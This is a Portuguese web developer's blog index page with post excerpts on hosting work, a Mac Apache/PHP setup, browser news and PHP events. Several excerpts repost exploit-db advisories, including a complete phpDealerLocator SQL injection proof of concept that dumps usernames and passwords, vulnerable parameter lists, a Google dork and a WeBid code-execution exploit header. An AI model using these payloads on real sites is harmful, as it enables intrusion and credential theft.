Novo Job: WebKing Hospedagem de Sites

26/06/2012 0 Comments

Depois de muitos dias sem postar venho por meio deste mostrar o último trabalho realizado:   webking.com.br   Trata-se de uma empresa de Hospedagem de Sites. Em breve detalho as ferramentas usadas neste job.

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

25/09/2011 6 Comments

Este artigo vai parecer muito com a instalação do apache, php e mysql sob mac os x snow leopard, porém existem algumas particularidades que precisam ser detalhadas. Antemão parte do artigo do mamp sob snow leopard será copiado, depois, iremos detalhar pontos MUITO importantes para que tudo funcione corretamente. Estamos testando em um hackintosh LION …

Joomla Component (com_jdirectory) SQL Injection Vulnerability

08/08/2011 0 Comments

===================================================================== .__ .__ __ .__ .___ ____ ___ _________ | | ____ |__|/ |_ |__| __| _/ _/ __ \ / /____ | | / _ | __ ______ | |/ __ | ___/ > < | |_> > |_( ) || | /_____/ | / /_/ | ___ >__/_ | __/|____/____/|__||__| |______ | / …

phpDealerLocator Multiple SQL Injection Vulnerabilities

04/07/2011 0 Comments

# Exploit Title: phpDealerLocator – Multiple SQL Injection vulnerabilities # Date: 7/3/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: phpdealerlocator.yourphppro.com # Tested on: [Linux/Windows 7] #Vulnerable Parameters: record.php?Dealer_ID= record_country.php?Dealer_ID= results_latlong.php?s_Latitude= results_latlong.php?s_Longitude= results_latlong.php?s_Dealer_Radius= results_phone.php?s_Dealer_Radius= results_radius.php?s_Dealer_Radius= ############################################################## PoC: http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users– ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew Fonte: http://www.exploit-db.com/exploits/17477/

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

04/07/2011 0 Comments

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability # Exploit Title: DmxReady Faqs Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_faqsmanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=faqs-manager-v1 # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior …

WeBid

04/07/2011 0 Comments

/* ———————————————————— WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit ———————————————————— author…: EgiX mail…..: n0b0d13s[at]gmail[dot]com link…..: http://www.webidsupport.com/ This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] Vulnerable code to SQL injection in feedback.php: 154. $query = “SELECT title FROM ” . $DBPrefix …

Joomla mdigg Component SQL Injection Vulnerability

01/07/2011 0 Comments

===================================================================== .__         .__  __            .__    .___ ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/ _/ __ \  /  /____ |  |  /  _ |     __  ______ |  |/ __ |   ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | ___  >__/_ |   __/|____/____/|__||__|           …

Projeto Flock dá tchau para a comunidade

12/04/2011 0 Comments

Foi anunciado recentemente pela própria equipe de desenvolvimento do Flock o fim do projeto. Nascido em 2005, o projeto tinha como proposta um navegador leve e de fácil utilização. Com o passar do tempo, o mercado de navegadores praticamente resumiu-se em poucas alternativas que de fato brilhavam bastante devido a fama já conquistada junto as …

BLOG: Adolescente com 12 anos de idade ganha 3000 U$ da Mozilla por causa de Exploit

24/10/2010 2 Comments

Segundo matéria publicada, um garoto de 12 anos de idade conseguiu explorar uma vulnerabilidade junto ao FireFox (considerado por muitos um dos melhores navegadores de todos os tempos) com uso de exploit. A Mozilla, como é de praxe sempre bonifica seus desenvolvedores que reportam bugs, como foi o caso deste jovem. A matéria relata que …

Twitter indisponível hoje :(

23/06/2010 0 Comments

Twitter fora do ar 🙁 as 13:15.

A web seria “mais um espaço”? Quake 2 + html 5 + google web kit – a nova era dos navegadores

04/04/2010 0 Comments

Uma das coisas que acho mais loucas na web é o desenvolvimento dela em relação a disponibilização de novos recursos. É impressionante o quanto a web vem crescendo e hoje gostaria de comentar rapidamente algo que nem acreditei quando vi. HTML 5 nem chegou direito e junto com ele a Google já faz “estrago de …

Gnu/Linux e suas dificuldades na usabilidade (diversidade que pode matar)

16/04/2009 0 Comments

Gnu/Linux sem dúvidas é a prática mais comum no mundo do Software Livre, em outras palavras, é o meio mais fácil e mais comum do mundo Open Source estar declarado em nosso dia-a-dia. Temos ferramentas de uso diário, que são open source e não percebemos, mas quando nos deparamos com o Gnu/Linux nós podemos afirmar …

Plesk 8 e Plesk 9 Como modificar páginas de erros personalizadas how to change customized error pages on plesk

24/03/2009 0 Comments

No meu blog littleoak eu fiz um how para isto: http://littleoak.wordpress.com/2009/03/24/plesk-8-e-plesk-9-como-modificar-paginas-de-erros-personalizadas-how-to-change-customized-error-pages-on-plesk/

Ativando register globals no Plesk 8 ou Plesk 9 How to enable register globals or safe mode on plesk

24/03/2009 0 Comments

Criei no littleoak um tutorial para isto. http://littleoak.wordpress.com/2009/03/24/ativando-register-globals-no-plesk-8-ou-plesk-9-how-to-enable-register-globals-safe-mode-on-plesk/

Evento: II encontro PHP-PB

22/02/2009 0 Comments

O que é? O segundo encontro do grupo de desenvolvedores PHP da Paraíba tem como objetivo reunir os membros do grupo, estudantes e profissionais da área de TI para troca de conhecimentos na tecnologia PHP e relacionadas. O encontro contará com palestras e momentos de networking entre os participantes. Se você não participou do primeiro …

II encontro PHP-PB

22/02/2009 3 Comments

O que é? O segundo encontro do grupo de desenvolvedores PHP da Paraíba tem como objetivo reunir os membros do grupo, estudantes e profissionais da área de TI para troca de conhecimentos na tecnologia PHP e relacionadas. O encontro contará com palestras e momentos de networking entre os participantes. Se você não participou do primeiro …

PHP 5.2.8 – Eu hein!

12/12/2008 0 Comments

Caramba, os caras do PHP estão mais rápidos que o super-herói The Flash, já lançaram a versão 5.2.8, que na realidade não passa de um pacth rápido da versão 5.2.7. Para conferir o lançamento “flash”, acessem: http://www.php.net/archive/2008.php#id2008-12-08-1

Lançado Python 3.0

06/12/2008 0 Comments

Abaixo segue nota retirada do OsNews: “Python 3.0 (a.k.a. ‘Python 3000’ or ‘Py3k’) is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated …